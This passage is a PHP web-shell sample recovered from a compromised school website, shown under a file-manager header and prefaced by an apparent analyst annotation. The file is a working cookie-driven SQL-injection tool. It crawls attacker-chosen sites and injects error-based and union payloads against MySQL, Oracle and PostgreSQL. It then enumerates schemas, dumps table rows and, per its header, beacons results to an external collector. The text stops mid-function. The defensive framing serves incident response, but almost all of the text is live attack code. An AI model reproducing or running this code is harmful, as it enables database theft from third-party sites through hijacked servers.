Your IP : 216.73.216.170


Current Path : /home/bitrix/ext_www/school1535.yacl.site/a74f7/
Upload File :
Current File : /home/bitrix/ext_www/school1535.yacl.site/a74f7/y345.php

<?php
/*
 * ANALYST NOTE — defensive annotation of a recovered sample; the code is left exactly as found.
 *
 * This file is a web-shell component: a cookie-driven SQL-injection scanner/dumper that uses the
 * compromised host as a proxy against third-party sites and beacons results to an external
 * collector. It is not part of the hosted application; the appropriate handling is removal and
 * incident response, not maintenance.
 *
 * Behaviour visible in the code:
 *  - error_reporting(0), ignore_user_abort(true), set_time_limit(0): runs silently, without a time
 *    limit, and keeps running after the requesting client disconnects.
 *  - All control input comes from cookies: a (mode: cr|ms|gc|gt|ts|dm), tg (target URL), td, ml,
 *    ms, do, dc, sd (collector host[:port]), st (socket receive timeout), bd, ft, ts, and eh
 *    (when truthy, results are printed into the HTTP response instead of beaconed).
 *  - Outbound requests from this host to attacker-chosen URLs via file_get_contents(); the
 *    query strings carry the literal hex markers 0x3a6f79753a (":oyu:"), 0x3a70687a3a (":phz:")
 *    and 0x4244764877697569706b ("BDvHwiuipk"), and responses are searched for ":oyu:".
 *  - Results are sent by a raw TCP socket as "GET http://<sd>/post.php" with the record packed
 *    into the Cookie header (tp=, cd=, id=, op=, nf=, sh=); sh= carries this shell's own URL
 *    (HTTP_HOST + SCRIPT_NAME).
 *
 * Detection / response: search access logs for requests to this path carrying the cookie names
 * above; search egress logs for "/post.php" requests with oversized Cookie headers and for the
 * marker strings; treat the whole webroot as compromised and hunt for sibling uploads.
 */
ignore_user_abort(true);error_reporting(0);set_time_limit(0);$a=$_COOKIE['a'];$eh=urldecode($_COOKIE['eh']);$tg=urldecode($_COOKIE['tg']);$td=urldecode($_COOKIE['td']);$ml=urldecode($_COOKIE['ml']);$ms=urldecode($_COOKIE['ms']);$do=explode("|",urldecode($_COOKIE['do']));$dc=explode("|",urldecode($_COOKIE['dc']));$sd=urldecode($_COOKIE['sd']);$st=urldecode($_COOKIE['st']);$bd=urldecode($_COOKIE['bd']);$ft=urldecode($_COOKIE['ft']);$ts=urldecode($_COOKIE['ts']);
// Builds $unipl, the list of union-select probe strings that injector(), get_db(), get_tab(), get_col() and dump() pick up via "global $unipl".
$xia='10';$xib='10';$ia=0;while($ia<$xia){$ib=0;while($ib<$xib){$res='union+all+select+';$res.=str_repeat("1,", $ia);$res.='CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)';$res.=str_repeat("1,", $ib);if(substr($res, -1)==','){$res=substr($res, 0, -1);}$res.='%23';$unipl[]='+-6863+'.$res;$unipl[]='+%27-6863+'.$res;$ib++;}$ia++;$xib--;}
// Mode cr: crawl the target (tg), then run injector() over the harvested URLs until one result is not 'fail'; reports 'OK' with the hit, else 'BD'. Note injector() is declared with one parameter but called with two.
if($a=='cr'){$crawled=crawl($tg,$ml);$crawled=optimus($crawled);foreach($crawled as $crawl){$injected=injector($crawl,$ml);if($injected['type']=='fail'){}else{break 1;}}if($injected['inj'] AND $injected['type']!='fail'){post_stats('cr','OK',$tg,$injected,$nfo);exit;}else{post_stats('cr','BD',$tg,$opt,$nfo);exit;}}
// Mode ms: enumerate databases through the injection described by td ("type|sobras|index"), drop those listed in bd, then walk tables of at most ms databases; columns are expanded only for tables listed in ft.
if($a=='ms'){$res_inj=explode("|",$td);$res_db=get_db($res_inj['0'],$tg,$res_inj['1'],$res_inj['2']);if(!$res_db['databases']){post_stats('ms','BD',$tg,$opt,$nfo);exit;}foreach($res_db['databases'] as $db_to_sch){$schema[$db_to_sch]=array();}$block_db=explode("|",$bd);$force_tab=explode("|",$ft);foreach($block_db as $bdb){$bdbs=array_search($bdb,$res_db['databases']);if($bdbs!==false){unset($res_db['databases'][$bdbs]);}}$msi=0;foreach($res_db['databases'] as $show_tab){if($msi<$ms){$res_tab=get_tab($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$show_tab);foreach($res_tab['tables'] as $show_col){if (in_array($show_col, $force_tab)) {$res_col=get_col($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$show_tab,$show_col);foreach($res_col['cols'] as 
$col_to_sch){$schema[$show_tab][$show_col][$col_to_sch]=array();}}else{$schema[$show_tab][$show_col]=array();}}}$msi++;}post_stats('ms','OK',$tg,$res_db,$schema);exit;}
// Mode gc: columns of one table (td = "type|sobras|index|database|table").
if($a=='gc'){$res_inj=explode("|",$td);$res_col=get_col($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4']);if(!$res_col['cols']){post_stats('gc','BD',$tg,$opt,$nfo);exit;}foreach($res_col['cols'] as $col_to_sch){$schema[$res_inj['3']][$res_inj['4']][$col_to_sch]=array();}post_stats('gc','OK',$tg,$opt,$schema);exit;}
// Mode gt: tables of one database (td = "type|sobras|index|database").
if($a=='gt'){$res_inj=explode("|",$td);$res_tab=get_tab($res_inj['0'],$tg,$res_inj['1'],$res_inj['2'],$res_inj['3']);if(!$res_tab['tables']){post_stats('gt','BD',$tg,$opt,$nfo);exit;}foreach($res_tab['tables'] as $tab_to_sch){$schema[$res_inj['3']][$tab_to_sch]=array();}post_stats('gt','OK',$tg,$opt,$schema);exit;}
// Mode ts: sub-modes hdb (tables of a database), htab (columns of a table) and hprev (preview dump of rows 0..do[1]); the injected URL is taken from do[0], not tg. In hdb, $force_tab is only ever assigned inside mode ms, so in_array() runs against an undefined variable here.
if($a=='ts'){if($ts=='hdb'){$res_inj=explode("|",$td);$res_tab=get_tab($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3']);if(!$res_tab){post_stats('ts','BD',$tg,$opt,$schema);exit;}foreach($res_tab['tables'] as $show_col){if (in_array($show_col, $force_tab)){$res_col=get_col($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$show_col);foreach($res_col['cols'] as $col_to_sch){$schema[$res_inj['3']][$show_col][$col_to_sch]=array();}}else{$schema[$res_inj['3']][$show_col]=array();}}$opt['ts']='hdb';post_stats('ts','OK',$tg,$opt,$schema);exit;}if($ts=='htab'){$res_inj=explode("|",$td);$res_col=get_col($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4']);if(!$res_col){post_stats('ts','BD',$tg,$opt,$schema);exit;}foreach($res_col['cols'] as 
$col_to_sch){$schema[$res_inj['3']][$res_inj['4']][$col_to_sch]=array();}$opt['ts']='htab';post_stats('ts','OK',$tg,$opt,$schema);exit;}if($ts=='hprev'){$res_inj=explode("|",$td);$dc[0]=$res_inj['5'];$res_dump=dump($res_inj['0'],$do['0'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4'],$dc,'0',$do['1']);post_stats('ts','OK',$tg,array('rows_total'=>$res_dump['rows_total'],'rows_done'=>$res_dump['rows_done'],'ts'=>'hprev'),$res_dump['dump']);exit;}}
// Mode dm: dump rows do[0]..do[1] of the columns listed in dc from the table named in td, against the URL in do[2].
if($a=='dm'){$res_inj=explode("|",$td);$res_dump=dump($res_inj['0'],$do['2'],$res_inj['1'],$res_inj['2'],$res_inj['3'],$res_inj['4'],$dc,$do['0'],$do['1']);post_stats('dm','OK',$tg,array('rows_total'=>$res_dump['rows_total'],'rows_done'=>$res_dump['rows_done'],'tg'=>$tg),$res_dump['dump']);exit;}
// crawl(): fetches $crawl_target, harvests <a href> links (dropping any containing facebook/javascript/twitter/youtube), follows up to $ml of them one level deeper, and returns the de-duplicated URLs that carry a query string. Every fetch is an outbound request from this host.
function crawl($crawl_target,$ml){$original_file = file_get_contents($crawl_target);$path_info = parse_url($crawl_target);$base = $path_info['scheme'] . "://" . $path_info['host'];$stripped_file = strip_tags($original_file, "<a>");$fixed_file = preg_replace("/<a([^>]*)href=\"\//is", "<a$1href=\"{$base}/", $stripped_file);$fixed_file = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$crawl_target}?", $fixed_file);$fixed_file = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$crawl_target}/?", $fixed_file);preg_match_all("/<a(?:[^>]*)href=\"([^\"]*)\"(?:[^>]*)>(?:[^<]*)<\/a>/is", $fixed_file, $matches);$result = $matches[1];$result = str_replace("<", "&lt;", $result);$p = parse_url($crawl_target);$host = $p['host'] ;foreach($result as $sresult){if(((strpos($sresult, "facebook"))) === false AND ((strpos($sresult, "javascript"))) === false AND ((strpos($sresult, "twitter"))) === false AND ((strpos($sresult, "youtube"))) === false){$items[] = $sresult;}}$result = array_unique($items);foreach($result as $checker){$checker = str_replace( " " ,"", $checker );if(strpos($checker, "://")===false){$final[] = "http://".$host."/$checker";}elseif(strpos($checker, $host)===false){}else{$final[] = $checker;}}$maxlonks = 
"0";foreach($final as $echo){$maxlonks++;if($maxlonks >= $ml){break;}$original_file2 = file_get_contents($echo); $path_info2 = parse_url($echo);$base2 = $path_info2['scheme'] . "://" . $path_info2['host'];$stripped_file2 = strip_tags($original_file2, "<a>");$fixed_file2 = preg_replace("/<a([^>]*)href=\"\//is", "<a$1href=\"{$base2}/", $stripped_file2);$fixed_file2 = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$echo}/?", $fixed_file2);preg_match_all("/<a(?:[^>]*)href=\"([^\"]*)\"(?:[^>]*)>(?:[^<]*)<\/a>/is", $fixed_file2, $matches2);$result2 = $matches2[1];$result2 = str_replace("<", "&lt;", $result2);$p2 = parse_url($echo);$host2 = $p2['host'];foreach($result2 as $sresult2){if(strpos($sresult2, "php?")!==false AND strpos($sresult2, "facebook")===false AND strpos($sresult2, "javascript")===false AND strpos($sresult2, "twitter")===false AND strpos($sresult2, "youtube")===false){$items2[] = $sresult2;}}}$resultados = array_unique($items2);foreach($resultados as $checker2){$checker2 = str_replace( " " ,"", $checker2 );if(strpos($checker2, "://") == NULL){$final2[] = "http://".$host."/$checker2";}elseif(strpos($checker2, $host2) == FALSE){}else{$final2[] = $checker2;}}$uniques = array_unique(array_merge($final, $final2));foreach($uniques as $quizas){if(strpos($quizas, "?")!==false AND strpos($quizas, "facebook")===false AND strpos($quizas, "javascript")===false AND strpos($quizas, "twitter")===false AND strpos($quizas, "youtube")===false){$items[] = $quizas;$return[]=$quizas;}}return $return;}
// injector(): for each query parameter of $target_inj, fetches variant URLs and looks for the ':oyu:' marker in the response. Returns an array with type = mysql_eb|mysql_ub|oracle_eb|posgre_eb (plus inj, query, sobras, index) or type = 'fail'. Reads the global $unipl list. Declared with one parameter although the caller passes two.
function injector($target_inj){global $unipl;$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = 
array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');$url = $target_inj;$eurl_a=explode("&",$url);$ea = "0";$ef = count($eurl_a);$final=array();$final[0]=$eurl_a[0];while($ea<$ef){$sobras=explode($eurl_a[$ea],$url);$url2=str_replace($sobras[1],"",$url);$payload = $url2."+and+1=1".$sobras[1];$payload2 = $url2."+and+1=2".$sobras[1];$payload3 = $url2."'".$sobras[1];$url_s=file_get_contents($payload);$url_s2=file_get_contents($payload2);$url_s3=file_get_contents($payload3);if (md5($url_s) != md5($url_s2) AND $url_s3 != $url_s2){if(strpos($url_s,"MySQL")!==false OR strpos($url_s,"mysql")!==false OR strpos($url_s2,"MySQL")!==false OR strpos($url_s2,"mysql")!==false OR strpos($url_s3,"MySQL")!==false OR strpos($url_s3,"mysql")!==false){$type="m";}elseif(strpos($url_s,"Oracle")!==false OR strpos($url_s,"ORA-")!==false OR strpos($url_s,"ora-")!==false OR strpos($url_s2,"Oracle")!==false OR strpos($url_s2,"ORA-")!==false OR strpos($url_s2,"ora-")!==false OR strpos($url_s3,"Oracle")!==false OR strpos($url_s3,"ORA-")!==false OR strpos($url_s3,"ora-")!==false) {$type="o";}elseif(strpos($url_s,"PostgreSQL")!==false OR strpos($url_s,"pg_query")!==false OR strpos($url_s,"unterminated quoted string")!==false OR strpos($url_s,"pg_exec()")!==false OR strpos($url_s2,"PostgreSQL")!==false OR strpos($url_s2,"pg_query")!==false OR strpos($url_s2,"unterminated quoted string")!==false OR strpos($url_s2,"pg_exec()")!==false OR strpos($url_s3,"PostgreSQL")!==false OR strpos($url_s3,"pg_query")!==false OR 
strpos($url_s3,"unterminated quoted string")!==false OR strpos($url_s3,"pg_exec()")!==false){$type="p";}else{$type="u";}if($type== "m" || $type== "u"){$as=1;foreach($a as $detectar){$html = file_get_contents($url2.$detectar.$sobras[1]);if(strpos($html, ':oyu:')!==false){$mode_eb = $as;$return['type']='mysql_eb';$return['inj']=$url2;		$return['query']=$detectar;$return['sobras']=$sobras[1];$return['index']=$mode_eb;return $return;}$as++;}$ass=1;foreach($unipl as $detectar2){$payload=$url2.$detectar2.$sobras[1];$html8 = file_get_contents($payload);	if(strpos($html8, ':oyu:')!==false){$mode_uq = $ass;$return['type']='mysql_ub';$return['inj']=$url2;		$return['query']=$detectar2;$return['sobras']=$sobras[1];$return['index']=$mode_uq;return $return;			}		$ass++;}}elseif($type=="o" || $type== "u"){$asd=1;foreach($c as $detectar){$html = file_get_contents($url2.$detectar.$sobras[1]);if(strpos($html, ':oyu:')!==false){$mode_oeb = $asd;$return['type']='oracle_eb';$return['inj']=$url2;		$return['query']=$detectar;$return['sobras']=$sobras[1];$return['index']=$mode_oeb;return $return;	}$asd++;}}elseif($type=="p" || $type== "u"){$asdf=1;foreach($d as $detectar){$html = file_get_contents("$url2+$detectar+$sobras[1]");if(strpos($html, ':oyu:')!==false){$mode_pg = $asdf;$return['type']='posgre_eb';$return['inj']=$url2;		$return['query']=$detectar;$return['sobras']=$sobras[1];$return['index']=$mode_pg;return $return;	}$asdf++;}}}$ea++;	}if(empty($return['type'])){$return['type']='fail';$return['inj']=$url;		$return['query']='';$return['sobras']='';$return['index']='';return $return;		}}
// get_db(): enumerates database names through the injection point described by ($type,$inj,$sobras,$index); one outbound request per name, with GetBetween() extracting the marker-delimited value. For posgre_eb the list is hard-coded to 'public'. Returns type, inj, sobras, index, databases.
function get_db($type,$inj,$sobras,$index){global 
$unipl;$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1];				$querys=str_replace("$payload_error","(SELECT+3830+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFNULL(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.SCHEMATA),0x3a70687a3a,FLOOR(RAND(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20),0x3a70687a3a)", $query);$querys=str_replace("%23", "+FROM+INFORMATION_SCHEMA.SCHEMATA%23", $querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];}if($mode=="mysql_error"){$queryn=str_replace("$payload_error", 
'(SELECT+7288+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFNULL(CAST(schema_name+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.SCHEMATA+LIMIT+$i,1),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype="mysql_eb";}elseif($mode=="mysql_union"){$queryn=str_replace("%23",'+FROM+INFORMATION_SCHEMA.SCHEMATA+LIMIT+$i,1%23', $query);$queryn=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)",'CONCAT(0x3a6f79753a,IFnull(CAST(SCHEMA_NAME+AS+CHAR),0x20),0x3a70687a3a)', $queryn);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype="mysql_ub";}elseif($mode=="oracle_error"){$queryn=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(USER%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20DUAL)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);$ntype="oracle_eb";$i = 0;$count=0;}elseif($mode=="postgre_error"){$ntype="posgre_eb";}if($mode=="postgre_error"){$databases[]='public';}else{while ($i <= $count){$query_number=str_replace('$i',"$i",$queryn);$database = GetBetween(file_get_contents($inj.$query_number.$sobras));$databases[]=$database;$i++;}}$return['type']=$ntype;$return['inj']=$inj;$return['sobras']=$sobras;$return['index']=$index;$return['databases']=$databases;}return $return;}
// get_tab(): enumerates table names of $database through the same injection point; one outbound request for the count, then one per table. Returns inj, sobras, tabs_count, tables, index, type, database.
function get_tab($type,$inj,$sobras,$index,$database){global $unipl;$database_hex = hexEncode($database);$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = 
array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){$inj = $inj;$index = $index;$sobras = $sobras;if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1];$querys=str_replace("$payload_error","(SELECT%203830%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20$database_hex%20),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)", $query);$querys=str_replace("%23", "%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20$database_hex%23", $querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];$database_chr = 
CHRize($database);$querys=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(TABLE_NAME)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TABLES%20WHERE%20OWNER%20IN%20(".$database_chr."))%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];$querys=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(tablename)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_tables%20WHERE%20schemaname%20IN%20((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))))",$query);}$return['inj']=$inj;$return['sobras']=$sobras;if($mode=="mysql_error"){$query_n=str_replace("$payload_error", '(SELECT%207288%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(table_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20'.$database_hex.'%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$columnasss="mysql_eb";}elseif($mode=="mysql_union"){$query_n=str_replace("%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()","%23", $query);$query_n=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(table_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20'.$database_hex.'%20LIMIT%20$i,1)', $query_n);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$columnasss="mysql_ub";}elseif($mode=="oracle_error"){$query_n=str_replace("$payload_oracle", 
'(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(TABLE_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20TABLE_NAME%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TABLES%20WHERE%20OWNER%20IN%20('.$database_chr.')%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query);$i = 1;$count=(GetBetween(file_get_contents($inj.$querys.$sobras)));$columnasss="oracle_eb";}elseif($mode=="postgre_error"){$query_n=str_replace("$payload_postgre", '(SELECT%20COALESCE(CAST(tablename%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_tables%20WHERE%20schemaname%20IN%20((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))%20OFFSET%20$i%20LIMIT%201)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$columnasss="posgre_eb";}$return['tabs_count']=$count;while ($i <= $count){$query_nombre=str_replace('$i',"$i",$query_n);$tabs[] = GetBetween(file_get_contents($inj.$query_nombre.$sobras));$i++;}$return['tables']=$tabs;$return['index']=$index;$return['type']=$columnasss;$return['database']=$database;}return $return;}
// get_col(): enumerates column names of $database.$table; one outbound request for the count, then one per column. Returns inj, sobras, database, table, cols_count, index, type, cols, cols_hex. $col_hex is never assigned, so cols_hex is always null. CHRize() is called here but not defined anywhere in this file.
function get_col($type,$inj,$sobras,$index,$database,$table){global $unipl;$database_hex=hexEncode($database);$table_hex=hexEncode($table);$payload_union="CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)";$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = 
array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1];$querys=str_replace("$payload_error","(SELECT+1906+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D$table_hex+AND+table_schema%3D".$database_hex."),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("$payload_union","CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(*)%20AS%20CHAR),0x20),0x3a70687a3a)",$query);$querys=str_replace("%23","%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D".$table_hex."%20AND%20table_schema%3D".$database_hex."%23",$querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];$table_chr = CHRize($table);$querys=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(*)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D".$table_chr.")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];$table_chr = 
